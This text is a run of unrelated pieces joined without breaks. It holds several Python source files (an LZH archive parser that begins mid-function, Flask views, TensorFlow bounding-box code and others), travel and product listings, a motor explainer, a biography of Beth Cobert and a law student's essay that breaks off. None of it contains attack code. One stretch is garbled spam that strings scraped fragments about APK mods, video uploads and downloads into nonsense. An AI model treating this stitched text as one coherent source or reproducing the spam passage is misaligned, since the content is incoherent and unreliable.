fp.tell() is_read = lambda x: fp.tell() + x < filesize if fp.tell() == filesize - 1: return None if not is_read(26): raise BadLhafile("Header is broken") # Check OS level os_level = ord(fp.read(21)[20]) fp.seek(-21, 1) if not os_level in (0, 1, 2): raise BadLhafile("this file level is out of support range %d" % os_level) if os_level in (0, 1): header_size, checksum, signature, skip_size, \ file_size, modify_time, reserved , os_level, \ filename_length = unpack('<BB5sII4sBBB', fp.read(22)) if is_read(filename_length + 2): filename, crc = unpack('<%dsH' % filename_length, fp.read(filename_length + 2)) if os_level == 0: ext_header_size = 0 pass elif os_level == 1: extra_data_size = header_size - (5+4+4+2+2+1+1+1+filename_length+2+1+2) os_identifier, extra_data, ext_header_size \ = unpack('<c%dsH' % extra_data_size, fp.read(1 + extra_data_size + 2)) sum_ext_header_size = 0 directory = None comment = None compress_size = skip_size - sum_ext_header_size elif os_level == 2: header = fp.read(26) all_header_size, signature, compress_size, file_size, \ modify_time, reserved, os_level, crc, os_identifier, \ ext_header_size = unpack('<H5sIIIBBHBH', header) sum_ext_header_size = 0 directory = None comment = None while ext_header_size != 0: sum_ext_header_size += ext_header_size if not is_read(ext_header_size): raise BadLhafile("File is broken") (ext,) = unpack('<B', fp.read(1)) if ext == 0x00: # Common header dummy, ext_header_size \ = unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1)) elif ext == 0x01: # Filename header filename, ext_header_size \ = unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1)) elif ext == 0x02: # Directory name header directory, ext_header_size \ = unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1)) elif ext == 0x3F: # Comment header comment, ext_header_size \ = unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1)) elif ext == 0x40: # Attribute Header if not ext_header_size == 5: raise BadLhafile("file is broken") attr, ext_header_size \ = unpack('<HH', fp.read(4)) else: # Skip the other dummy, ext_header_size \ = unpack('<%dsH' % (ext_header_size - 3), fp.read(ext_header_size-1)) # skip to next header file_offset = fp.tell() if os_level in (0, 1): compress_size = skip_size - sum_ext_header_size if not is_read(compress_size): raise BadLhafile("Compress data is too short") fp.seek(compress_size, 1) # modify_time if os_level in (0, 1): year = (ord(modify_time[3]) >> 1) + 1980 month = ((ord(modify_time[3]) << 8 | ord(modify_time[2])) >> 5) & 0x0F day = ord(modify_time[2]) & 0x1F hour = ord(modify_time[1]) >> 3 minute = ((ord(modify_time[1]) << 8 | ord(modify_time[0])) >> 5) & 0x3F second = (ord(modify_time[0]) & 0x1F) * 2 #print(os_level, year, month, day, hour, minute, second) try: date_time = datetime.datetime(year, month, day, hour, minute, second) except Exception: date_time = datetime.datetime(1970, 1, 1) create_time = date_time elif os_level in (2,): dummy_date = datetime.datetime(1970,1,1) date_time = dummy_date.fromtimestamp(modify_time) create_time = date_time info = LhaInfo() # FIXME: hardcoding ISO-8859-1 is not very nice filename = filename.decode("ISO-8859-1") if directory is None: # for lhaplus archive #sjisname = unicode(filename, 'cp932') #if '\\' in sjisname: # sjispath = [s.encode('cp932') for s in sjisname.split(u'\\')] # filename = os.sep.join(sjispath) # directory = os.sep.join(sjispath[:-1]) pass else: #print(repr(directory)) # FIXME: hardcoding ISO-8859-1 is not very nice directory = directory.decode("ISO-8859-1") directory = os.sep.join(directory.split('\xff')) filename = os.path.join(directory, filename) info.directory = directory info.filename = filename info.compress_size = compress_size info.file_size = file_size info.CRC = crc info.header_offset = initial_pos info.file_offset = file_offset info.external_attr = None info.internal_attr = None info.reserved = 0 info.comment = comment info.compress_type = signature info.date_time = date_time if "\x00" in info.filename: info.filename, info.comment = info.filename.split("\x00") return info def lhaname(self): return self.filename def namelist(self): if self.filelist: return [d.filename for d in self.filelist \ if d.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE] return None def infolist(self): return self.filelist def read(self, name): """Return file bytes (as a string) for 'name'. """ if not self.fp: raise RuntimeError("Attempt to read LZH archive that was already closed") info = self.NameToInfo[name] if info.compress_type in Lhafile.SUPPORTED_COMPRESS_TYPE: self.fp.seek(info.file_offset) fin = BytesOrStringIO(self.fp.read(info.compress_size)) fout = BytesOrStringIO() try: session = lzhlib.LZHDecodeSession(fin, fout, info) while not session.do_next(): pass outsize = session.output_pos crc = session.crc16 except Exception as e: raise e if outsize != info.file_size: raise BadLhafile("%s output_size is not matched %d/%d %s" % \ (name, outsize, info.file_size, info.compress_type)) if crc != info.CRC: raise BadLhafile("crc is not matched") fout.seek(0) bytes = fout.read() elif info.commpress_type == '-lhd-': raise RuntimeError("name is directory") else: raise RuntimeError("Unsupport format") return bytes Lhafile = LhaFile
For the first time ever, Toronto will celebrate the LGBTQ community for an entire month - say hello to Pride Month. Beginning June 1st, the inaugural event kicks off with the official rainbow flag raising ceremony at Queen’s Park and culminates with the colourful and legendary Pride Parade on July 3. The month-long celebrations will spread to every corner of the city, transforming the streets into wild parties and drawing in over a million people from across the globe. In celebration of Pride Month, Booking.com, the global leader in connecting travellers with the widest choice of incredible places to stay, has scoped out the city’s best accommodations to experience the festivities and join in on all the fun! Be in the heart of it all and stay in the Village! Home to the annual Pride Festival, the area between Church and Wellesley turns into a massive ten day celebration hosting countless parties, performances by some of Toronto’s best drag queens and a huge street fair featuring local artisans and delicious food vendors. Luckily, you’ll wake up each morning to a full service breakfast at this quaint property and get the fuel you’ll need to keep going. Located just steps from Queen’s Park, you might be fortunate enough to bump into Premiere Kathleen Wynn, who will officially kick off celebrations with the annual raising of the rainbow flag. With options to stay in a one or two bedroom unit, the newly renovated designer suites are perfect for families or couples looking to enjoy the entirety of Pride Month. Complete with a full kitchen, dining and lounging space and access to an indoor pool, it’s guaranteed to feel like a home-away-from-home. All we can say about this five-star accommodation is that it’s absolutely fabulous! The Euro-chic inspired luxury hotel is situated in the incredibly trendy Yorkville area and ideally suited for the diva inside all of us. Each suite comes furnished with a musical instrument and a large limestone bathroom perfect for winding down after a long night out. Moments away, guests will find the Royal Ontario Museum, which is scheduled to host a special one-night-only queer party soiree where go-go boys and drag stars will entertain amongst the dinosaurs. As a proud supporter of the community, the Drake Hotel is a favourite party spot, usually offering extended hours during Pride. The gay-friendly space in the heart of Queen West hosts a slew of local bands and DJs almost every night, and is perfect for the partygoers. Besides its lively nightlife, the boutique hotel boasts uniquely designed rooms and is surrounded by some of the city’s best restaurants, trendy bars and art galleries. The heart of Pride might be in the Village, but you’ll find its beat comes from the newly developed waterfront. Expect a massive dance party at Sugar Beach, free outdoor film screenings at the Harbourfront Centre and chance to try out your Spanish dance moves on the pier. With so much going on the city’s south side, the elegant One King West Hotel will serve as the ideal home base and offer easy access to these must-do events.
# # This file is part of Dragonfly. # (c) Copyright 2007, 2008 by Christo Butcher # Licensed under the LGPL. # # Dragonfly is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Dragonfly is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with Dragonfly. If not, see # <http://www.gnu.org/licenses/>. # """ Dictation container base class ============================================================================ This class is used to store the recognized results of dictation elements within voice-commands. It offers access to both the raw spoken-form words and be formatted written-form text. The formatted text can be retrieved using :meth:`~DictationContainerBase.format` or simply by calling ``str(...)`` on a dictation container object. A tuple of the raw spoken words can be retrieved using :attr:`~DictationContainerBase.words`. """ #--------------------------------------------------------------------------- # Dictation base class -- base class for SR engine-specific containers # of dictated words. class DictationContainerBase(object): """ Container class for dictated words as recognized by the :class:`Dictation` element. This base class implements the general functionality of dictation container classes. Each supported engine should have a derived dictation container class which performs the actual engine- specific formatting of dictated text. """ def __init__(self, words): """ A dictation container is created by passing it a sequence of words as recognized by the backend SR engine. Each word must be a Unicode string. :param words: A sequence of Unicode strings. :type words: sequence-of-unicode """ self._words = tuple(words) self._formatted = None def __str__(self): return unicode(self).encode("windows-1252") def __unicode__(self): if self._formatted is None: self._formatted = self.format() return self._formatted def __repr__(self): message = u"%s(%s)" % (self.__class__.__name__, u", ".join(self._words)) return message.encode("windows-1252") @property def words(self): """ Sequence of the words forming this dictation. """ return self._words def format(self): """ Format and return this dictation as a Unicode object. """ return u" ".join(self._words)
This historic B&B is conveniently located within walking distance to downtown. A few units feature an electric fireplace. Not evaluated. Facilities, services, and décor characterize a mid-scale property. SR 29 exit Lincoln Ave E, 0.5 mi e to Jefferson St, then 0.5 mi s; jct Calistoga Ave. 1301 Jefferson St 94559.
# coding=utf-8 """Helper methods.""" from threading import Thread from flask import jsonify from werkzeug.exceptions import HTTPException from flask_mail import Message from users import mail, APP def make_json_error(ex): """Return errors as json. See http://flask.pocoo.org/snippets/83/ :param ex: An exception. :return: HttpResponse """ response = jsonify(message=str(ex)) response.status_code = ( ex.code if isinstance(ex, HTTPException) else 500) return response def send_mail(sender, recipients, subject, text_body, html_body): """To send a single email from sender to receiver synchronously :param sender: Sender of the email. :type sender: str :param recipients: Recipients email address. :type recipients: list :param subject: Subject of the email. :type subject: str :param text_body: Text of the body. :type text_body: str :param html_body: HTML of the body. :type html_body: str """ # Get mail server configuration message = Message(subject=subject, sender=sender, recipients=recipients) message.body = text_body message.html = html_body with APP.app_context(): mail.send(message) def send_async_mail(sender, recipients, subject, text_body, html_body): """To send email asynchronously :param sender: Sender of the email. :type sender: str :param recipients: Recipients email address. :type recipients: list :param subject: Subject of the email. :type subject: str :param text_body: Text of the body. :type text_body: str :param html_body: HTML of the body. :type html_body: str :return sender_thread: The thread for sending the email. :rtype: Thread """ sender_thread = Thread( target=send_mail, args=[sender, recipients, subject, text_body, html_body] ) sender_thread.start() return sender_thread
6 Apr Google and Mozilla now offer bit versions of Chrome and Firefox for Windows. Here's how to find out what version you're running and how. 15 Dec bit Firefox web browser supports bit Windows systems and delivers high performance browsing on web games and other web. 9 Oct - 56 min - Uploaded by AzooTube CHEB FETHI -CHEB MOURAD - CHEB JALIL -7BIB HIMOUNE - CHEB WAHID - CHEB. 22 May - 20 min - Uploaded by Compilation Rai Officiel Best Rai Jdid Music (Compilation) • [Vol71]. Compilation Rai Official. THE YI SOON SHIN COLLECTABLE SILVER COIN. AVAILABLE NOW · THE SERIES. THE TRILOGY. This is a limited series based on the true story of Admiral . YI SOON SHIN is a historical fiction fantasy graphic novel comic book by Onrie Kompan, Publication history. 26 Oct - 4 min - Uploaded by weddingsofficial Weddings is an upcoming Malayalam romantic comedy film directed by Shafi and starring. 25 Feb - 1 min - Uploaded by ziyakaraoke recordingstudio contact for full karaoke whatsapp number ; + email - ziyakaraoke @bangertgardens.com Posts about changathi lyrics weddings written by vimalsuresh.. 21 Sep Download Free Sea Stars Apk Mod Unlock All - Download Unlimited Apk For Android. Sea Stars Apk Mod Unlock All - Direct Download Link. 28 Jan You are Downloading Sea Stars v Mod Latest APK The Size of Sea Stars v Mod is Mb. 30 May Metacritic Game Reviews, Surf's Up for Xbox , Surf's Up is an arcade surfing and extreme sports video game. The action is set at the annual. Platform:Xbox Surf's Up is exciting arcade surfing and extreme sports action. Head out to the "Reggie Belafonte Big Z Memorial Surf Off," where surfers from. 30 Apr - 4 min - Uploaded by Utree 3 TOp 5 First PeRson MOTORBIke motorcycle Racing GaMes If you like bike racing games or. 5 Jul After six years of fantastic urban motor racing action, British developer Bizarre GTA IV: The Lost And The Damned (Xbox , PS4, PC, ). Download free full version game Moto Racing for pc or notebook ✓ Best online game downloads at FreeGamePick.. 8 Oct Ugo Chirico - Fisico Cibernetico - Smart Card Console allows to (APDU) to the virtual reader with a virtual smart card for training with ISO. 12 Sep Ugo's Virtual Smart Card Reader end Emulator by Ugo Chirico. Versions: File name: bangertgardens.com 12 Sep No specific info about version Please visit the main page of Ugo's Virtual Smart Card Reader end Emulator on Software Informer.. Add hosts manager; Add enable windows defender feature. Fix PcaSvc DWS Build Support Windows Redstone. @Nummer DWS Lite Rollup edition. 8 Feb Offering a positive view of the family, Cox's HUMAN INTIMACY: MARRIAGE, THE FAMILY, AND ITS MEANING, Eleventh Edition discusses the. Offering a positive view of the family, Cox's HUMAN INTIMACY: MARRIAGE, THE FAMILY, the Family, and Its Meaning (Cengage Advantage Books) 11th Edition .. Frank Cox holds a Ph.D. in Educational Psychology from the University of.
# -*- coding: utf-8 -*- from flask import render_template, request, redirect, url_for, flash from . import mod from flask.ext.login import login_required from flask.ext import login from app.models import paginate from app.modules.adm.models.usuario import Perfil from app.modules.adm.forms.perfil import PerfilForm from flask.ext.wtf import Form from app import db @mod.route('/perfil', defaults={'page' : 1}) @mod.route('/perfil/listar') @mod.route('/perfil/listar/<int:page>') @login_required def perfil_listar_view(page): perfis = Perfil.query.order_by('nome ASC').all() res = paginate(perfis, page, Perfil, 8) return render_template('adm/perfil/listar.html', active_page='adm', user=login.current_user, **res) @mod.route('/perfil/adicionar', methods=["GET", "POST"]) @login_required def perfil_adicionar_view(): form = PerfilForm(request.form) if request.method == 'POST' and form.validate(): p = Perfil() p.nome = form.nome.data p.ativo = form.ativo.data try: db.session.add(p) db.session.commit() except: flash(u'Não foi possível inserir o perfil', 'danger') flash(u'Perfil inserido com sucesso!', 'success') return redirect(url_for('.perfil_listar_view')) return render_template('adm/perfil/adicionar.html', active_page='adm', user=login.current_user, form=form) @mod.route('/perfil/editar/id/<int:id>', methods=["GET", "POST"]) @login_required def perfil_editar_view(id): try: p = Perfil.query.get(id) except: flash(u'Perfil não encontrado', 'danger') return redirect(url_for('.perfil_listar_view')) form = PerfilForm(request.form, obj=p) if request.method == 'POST' and form.validate(): p.nome = form.nome.data p.ativo = form.ativo.data try: db.session.add(p) db.session.commit() except: flash(u'Não foi possível alterar o perfil', 'danger') flash(u'Perfil foi alterado com sucesso!', 'success') return redirect(url_for('.perfil_listar_view')) return render_template('adm/perfil/editar.html', active_page='adm', user=login.current_user, form=form) @mod.route('/perfil/deletar/id/<int:id>', methods=["GET"]) @login_required def perfil_deletar_view(id): try: p = Perfil.query.get(id) db.session.delete(p) db.session.commit() flash(u'Registro removido com sucesso', 'success') except: flash(u'Registro não encontrado no sistema', 'danger') return redirect(url_for('.perfil_listar_view')) @mod.route('/perfil/exibir/id/<int:id>', methods=["GET"]) @login_required def perfil_exibir_view(id): try: p = Perfil.query.get(id) except: flash(u'Perfil não encontrado!', 'danger') return redirect(url_for('.perfil_listar_view')) return render_template('adm/perfil/exibir.html', active_page='adm', user=login.current_user, data=p) @mod.route('/perfil/pesquisar', methods=["POST"]) @login_required def perfil_pesquisar_view(): q = request.form['q'] if request.method == 'POST': if q != '': busca_perfil = Perfil.query.filter(Perfil.nome.like('%' + q + '%')).all() else: busca_perfil = Perfil.query.order_by('nome ASC').all() return render_template('adm/perfil/pesquisar.html', dados=busca_perfil)
The 3-phase power to an induction motor is applied to windings in the stator or outside of the motor. The windings are connected into poles. The poles may be salient (protruding) or more commonly embedded in slots in the stator punchings. Poles for the three phases are placed in a sequence. There must be an even number of poles for each phase. A two-pole motor will produce a magnetic field which rotates once each cycle of the mains power (3600 RPM at 60 Hz, 3000 RPM at 50 Hz). Increasing the number of poles will slow the rotation of the magnetic field. 4 pole (1800 RPM) and 6 pole (1200 RPM) motors are most common. A link from https://people.ucalgary.ca/~aknigh/electrical_machines/fundamentals/f_ac_rotation.html shows an animation of the rotating field. The stator windings must be insulated from the steel laminations in the stator. In addition, the laminations must be insulated from adjacent laminations to prevent heating due to eddy currents. The insulation is provided by resins or oxides on the laminations and tape or resins in the coils. The attached photo shows a cross-section of a high voltage stator coil. Note the thin tape layer wound around 14 conductor triplets. Also, note the thick tape insulation to ground. Copper is a very malleable material and coils can show tremendous variety. It is interesting to compare some terms and materials used in motor construction and compare them with the web handling industry. Conductors in coils are wound or pressed into shape using wire or bars. The tape insulation on high voltage coils is wound around the coil. Pressure, vacuum, and heat are used to treat the resins in the insulation and the entire stator.
import tensorflow as tf def get_width_upright(bboxes): with tf.name_scope('BoundingBoxTransform/get_width_upright'): bboxes = tf.cast(bboxes, tf.float32) x1, y1, x2, y2 = tf.split(bboxes, 4, axis=1) width = x2 - x1 + 1. height = y2 - y1 + 1. # Calculate up right point of bbox (urx = up right x) urx = x1 + .5 * width ury = y1 + .5 * height return width, height, urx, ury def encode(bboxes, gt_boxes, variances=None): with tf.name_scope('BoundingBoxTransform/encode'): (bboxes_width, bboxes_height, bboxes_urx, bboxes_ury) = get_width_upright(bboxes) (gt_boxes_width, gt_boxes_height, gt_boxes_urx, gt_boxes_ury) = get_width_upright(gt_boxes) if variances is None: variances = [1., 1.] targets_dx = (gt_boxes_urx - bboxes_urx)/(bboxes_width * variances[0]) targets_dy = (gt_boxes_ury - bboxes_ury)/(bboxes_height * variances[0]) targets_dw = tf.log(gt_boxes_width / bboxes_width) / variances[1] targets_dh = tf.log(gt_boxes_height / bboxes_height) / variances[1] targets = tf.concat( [targets_dx, targets_dy, targets_dw, targets_dh], axis=1) return targets def decode(roi, deltas, variances=None): with tf.name_scope('BoundingBoxTransform/decode'): (roi_width, roi_height, roi_urx, roi_ury) = get_width_upright(roi) dx, dy, dw, dh = tf.split(deltas, 4, axis=1) if variances is None: variances = [1., 1.] pred_ur_x = dx * roi_width * variances[0] + roi_urx pred_ur_y = dy * roi_height * variances[0] + roi_ury pred_w = tf.exp(dw * variances[1]) * roi_width pred_h = tf.exp(dh * variances[1]) * roi_height bbox_x1 = pred_ur_x - 0.5 * pred_w bbox_y1 = pred_ur_y - 0.5 * pred_h # This -1. extra is different from reference implementation. bbox_x2 = pred_ur_x + 0.5 * pred_w - 1. bbox_y2 = pred_ur_y + 0.5 * pred_h - 1. bboxes = tf.concat( [bbox_x1, bbox_y1, bbox_x2, bbox_y2], axis=1) return bboxes def clip_boxes(bboxes, imshape): """ Clips bounding boxes to image boundaries based on image shape. Args: bboxes: Tensor with shape (num_bboxes, 4) where point order is x1, y1, x2, y2. imshape: Tensor with shape (2, ) where the first value is height and the next is width. Returns Tensor with same shape as bboxes but making sure that none of the bboxes are outside the image. """ with tf.name_scope('BoundingBoxTransform/clip_bboxes'): bboxes = tf.cast(bboxes, dtype=tf.float32) imshape = tf.cast(imshape, dtype=tf.float32) x1, y1, x2, y2 = tf.split(bboxes, 4, axis=1) width = imshape[1] height = imshape[0] x1 = tf.maximum(tf.minimum(x1, width - 1.0), 0.0) x2 = tf.maximum(tf.minimum(x2, width - 1.0), 0.0) y1 = tf.maximum(tf.minimum(y1, height - 1.0), 0.0) y2 = tf.maximum(tf.minimum(y2, height - 1.0), 0.0) bboxes = tf.concat([x1, y1, x2, y2], axis=1) return bboxes def change_order(bboxes): """Change bounding box encoding order. TensorFlow works with the (y_min, x_min, y_max, x_max) order while we work with the (x_min, y_min, x_max, y_min). While both encoding options have its advantages and disadvantages we decided to use the (x_min, y_min, x_max, y_min), forcing use to switch to TensorFlow's every time we want to use a std function that handles bounding boxes. Args: bboxes: A Tensor of shape (total_bboxes, 4) Returns: bboxes: A Tensor of shape (total_bboxes, 4) with the order swaped. """ with tf.name_scope('BoundingBoxTransform/change_order'): first_min, second_min, first_max, second_max = tf.unstack( bboxes, axis=1 ) bboxes = tf.stack( [second_min, first_min, second_max, first_max], axis=1 ) return bboxes if __name__ == '__main__': import numpy as np bboxes = tf.placeholder(tf.float32) bboxes_val = [[10, 10, 20, 22]] gt_boxes = tf.placeholder(tf.float32) gt_boxes_val = [[11, 13, 34, 31]] imshape = tf.placeholder(tf.int32) imshape_val = (100, 100) deltas = encode(bboxes, gt_boxes) decoded_bboxes = decode(bboxes, deltas) final_decoded_bboxes = clip_boxes(decoded_bboxes, imshape) with tf.Session() as sess: final_decoded_bboxes = sess.run(final_decoded_bboxes, feed_dict={ bboxes: bboxes_val, gt_boxes: gt_boxes_val, imshape: imshape_val, }) assert np.all(gt_boxes_val == final_decoded_bboxes)
Created in 1897, this antique Alfred Meakin dinner plate hails from Tunstall, England. Decorated in the Medway Blue pattern consisting of flowering tree branches, butterflies and a decorative inner band with geometric flowers, this is one of the prettiest antique dinner plates we have ever seen. Hard to find, in single dish form, this beauty is a bit of a rarity which makes it all the more treasured. Most Medway place settings are sold in whole or almost complete sets, so we are excited to offer this plate as a single item, whether it fills out your Medway collection or it enhances your current mix and max china pieces. With over 120 years of age to it, it is fun to imagine all the dinner parties this one plate must have experienced. Dreamy and functional - that's the best kind of dinnerware in the land of the Vintage Kitchen! As for the pottery company, Alfred Meakin was in business from 1875-1976. After changing hands (and names!) several times throughout the 20th century, it finally came to rest with the Churchill Group in 1991. In gorgeous antique condition. Some very light utensil marks can be seen when held at an angle towards the light. There is a small pencil point size very old chip near the rim of the plate (please see photos). Other than that, this plate is just lovely, especially considering it is over 120 years old. Measures 10" inches in diameter. Because this plate is so attractive in appearance, it would look lovely in a collection of mismatched blue and white china, or as an elegant wall hanging for a beach house or country cottage kitchen.
# Copyright (c) 2015 Uber Technologies, Inc. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from __future__ import absolute_import import opentracing def start_child_span(operation_name, tracer=None, parent=None, tags=None): """ Start a new span as a child of parent_span. If parent_span is None, start a new root span. :param operation_name: operation name :param tracer: Tracer or None (defaults to opentracing.tracer) :param parent: parent Span or None :param tags: optional tags :return: new span """ tracer = tracer or opentracing.tracer return tracer.start_span( operation_name=operation_name, child_of=parent.context if parent else None, tags=tags )
Sally is a Level 3 qualified weight trainer, Personal Trainer and a runner. She has been weight training for a number of years where she is now competing. Sally began to train at the age of 16 and as soon as she began to see a difference in her physique, she was inspired to continue. Sally has suffered with 3 slipped discs in her spine but found that continuing to weight train really helped strengthen her muscles and reduce the pain. Sally was asked regularly by people in her gym if she competed in competitions but she never had, she only ever trained to keep fit. Now at the age of 43, she took part in her first competition at Miss Galaxy Universe 2012 and Won the Fitness Model title. Sally uses a number of products in the LA Muscle range to help with her fitness career including Diet Whey Protein (as her main source of protein) Six Pack Pill (to help keep her stomach in good shape and condition), Sculpt (to aid with her lean toned physiqe) and 311 BCAAs to ensure she has fully recovered from her tough training sessions.
# -*- coding: utf-8 -*- # This source file is part of mc4p, # the Minecraft Portable Protocol-Parsing Proxy. # # Copyright (C) 2011 Matthew J. McGill, Simon Marti # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License v2 as published by # the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. import os.path, logging, logging.config class PartialPacketException(Exception): """Thrown during parsing when not a complete packet is not available.""" pass class Stream(object): """Represent a stream of bytes.""" def __init__(self): """Initialize the stream.""" self.buf = "" self.i = 0 self.tot_bytes = 0 self.wasted_bytes = 0 def append(self,str): """Append a string to the stream.""" self.buf += str def read(self,n): """Read n bytes, returned as a string.""" if self.i + n > len(self.buf): self.wasted_bytes += self.i self.i = 0 raise PartialPacketException() str = self.buf[self.i:self.i+n] self.i += n return str def reset(self): self.i = 0 def packet_finished(self): """Mark the completion of a packet, and return its bytes as a string.""" # Discard all data that was read for the previous packet, # and reset i. data = "" if self.i > 0: data = self.buf[:self.i] self.buf = self.buf[self.i:] self.tot_bytes += self.i self.i = 0 return data def __len__(self): return len(self.buf) - self.i def write_default_logging_file(lpath): """Write a default logging.conf.""" contents=""" [loggers] keys=root,mc4p,plugins,parsing [handlers] keys=consoleHdlr [formatters] keys=defaultFormatter [logger_root] level=WARN handlers=consoleHdlr [logger_mc4p] handlers= qualname=mc4p [logger_plugins] handlers= qualname=plugins [logger_parsing] handlers= qualname=parsing [handler_consoleHdlr] class=StreamHandler formatter=defaultFormatter args=(sys.stdout,) [formatter_defaultFormatter] format=%(levelname)s|%(asctime)s|%(name)s - %(message)s datefmt=%H:%M:%S """ f=None try: f=open(lpath,"w") f.write(contents) finally: if f: f.close() logging_configured = False def config_logging(logfile=None): """Configure logging. Can safely be called multiple times.""" global logging_configured if not logging_configured: dir = os.path.dirname(os.path.abspath(__file__)) if not logfile: logfile = os.path.join(dir, 'logging.conf') if not os.path.exists(logfile): write_default_logging_file(logfile) logging.config.fileConfig(logfile) logging_configured = True
Acting Director of the Office of Personnel Management: Who Is Beth Cobert? Cobert is from Montclair, New Jersey, where her father, Maxwell, was a senior vice president of a fabric company and her mother, Shirley, was a freelance editor. Cobert graduated from Montclair High School in 1976. She stayed close to home in college, attending Princeton and earning a bachelor’s degree in economics in 1980. Cobert worked for a time at investment bankers Goldman Sachs in its corporate finance division, but left to earn her MBA at Stanford. She graduated from that school in 1984 and went to work for McKinsey & Co. consultants in New York. McKinsey is regarded by many in the business world as the most reputable, elite firm of its kind. The firm provides all kinds of advice to its corporate and public-sector clients, including how to approach downsizing. Cobert specialized in the financial services, telecommunications, and health-care industries. In 1994, she moved to McKinsey’s San Francisco office, where she remained for the rest of her tenure. She was a director and senior partner of the firm before she left in 2013 to join the federal government. Cobert was confirmed October 16, 2013, as OMB’s deputy director. While there, she urged changes in federal hiring practices, including considering the hiring of younger employees for shorter terms, putting hiring in the hands of the line departments instead of a human resources group, and instituting continuing training. Cobert married Adam Cioth, who at the time worked for Goldman Sachs, in 1987. Cioth went on to found a venture capital firm, Rolling Hills Capital. He’s now on the board of Students for Education Reform, an “astroturf” lobbying group (a “synthetic” grassroots movement) backing charter schools and taking power from teachers’ unions. They have a son and a daughter.
from typing import Tuple import math # max number of significant digits for a 64-bit float _MAX_SIGNIFICANT_DIGITS_AFTER_DOT = 15 _MIN_EXP = -323 _MAX_EXP = 308 def sround(value: float, ndigits: int = 0, int_part=False) -> float: """ Round *value* to significant number of digits *ndigits*. :param value: The value to round. :param ndigits: The number of digits after the first significant digit. :param int_part: :return: """ ndigits_extra = _ndigits_extra(value, int_part=int_part) ndigits += ndigits_extra return round(value, ndigits=ndigits) def sround_range(range_value: Tuple[float, float], ndigits: int = 0, int_part=False) -> Tuple[float, float]: value_1, value_2 = range_value ndigits_extra_1 = _ndigits_extra(value_1, int_part=int_part) ndigits_extra_2 = _ndigits_extra(value_2, int_part=int_part) ndigits += min(ndigits_extra_1, ndigits_extra_2) return round(value_1, ndigits=ndigits), round(value_2, ndigits=ndigits) def _ndigits_extra(value: float, int_part: bool) -> int: ndigits = -int(math.floor(_limited_log10(value))) if ndigits < 0 and not int_part: return 0 return ndigits def _limited_log10(value: float) -> float: if value > 0.0: exp = math.log10(value) elif value < 0.0: exp = math.log10(-value) else: return _MIN_EXP if exp < _MIN_EXP: return _MIN_EXP if exp > _MAX_EXP: return _MAX_EXP return exp
I remember the first time that I walked the vaunted halls of HLS. After years of dedication, I felt blessed and privileged to be an incoming Harvard Law student. And yet, despite Dean Minnow’s reassurance that the admissions committee had not made a mistake, that in fact they had searched the world for us, I shared the nerves and insecurities of my peers. Worried about showing up late to my first class? Check. Worried about not getting my books on time? Check. Worried about embarrassing myself beyond repair during my first cold call? Double and triple check. Now two years older and still petrified of cold calls, I recognize that underlying my concerns was the fear of not fitting in. I struggled to internalize my accomplishments and carried a persistent fear of being exposed as a fraud. It took me a few weeks into my first semester to realize I was not alone in dealing with what is commonly known as impostor syndrome. My fear of not fitting in grew exponentially when I began applying for professional positions. I was raised by two tremendously hardworking parents. My dad worked in construction and my mom, all 4′ 11″ of her, hung off the edge of Los Angeles skyscrapers, cleaning their windows. My parents are my role models, and seeing them get ready for work every morning in a translucent vest, hardhat and steel-toed boots shaped my notion of a work uniform. I saw their uniforms as empowering symbols of hard work and perseverance. However, the idea of having a suit as my work uniform made me uneasy. As a first generation law student, I had never owned a suit and didn’t know the first thing about tying a Full Windsor knot or differentiating between wingtips and cap toes. With EIP and OPIA interviews approaching, I grew anxious. Thankfully, I did not need to take this next step alone. We have all gotten to this point because we’ve overcome substantial trials and tribulations. I was hesitant to share my distress because I knew how trivial it could seem. Still, I eventually opened up to a friend. The next day we jumped on the Red Line, made our way to downtown Boston and together we picked out my first suit. I know we’ve all heard it by now but it warrants repeating — the people at HLS are what make it a world-class institution. Last year, HLS held its Third Celebration of Latino Alumni. During the festivities, I grew close to one alumnus in particular as we bonded over our Los Angeles roots. She asked if I had suits for my summer internship. I told her that I had my first suit but would welcome help selecting my second. Before l knew it, she put me in contact with her husband and that spring break I received an early Christmas present when he took me shopping to fill out my summer wardrobe. I was blown away by their generosity and eagerness to help. They only asked for one thing in return: that I pay it forward. I used to shudder at the idea of networking, the thought of having to force a connection with a stranger. However, my experience these past two years has taught me that networking can take a whole different meaning when you stop thinking about it as seeking professional connections and allow yourself to simply make human connections. You were chosen as much for your impressive abilities as a student as for your remarkable traits as human beings. As you enter HLS, you might feel your insecurities and innermost fears will alienate you from your peers. From first-hand experience, I know you’d be 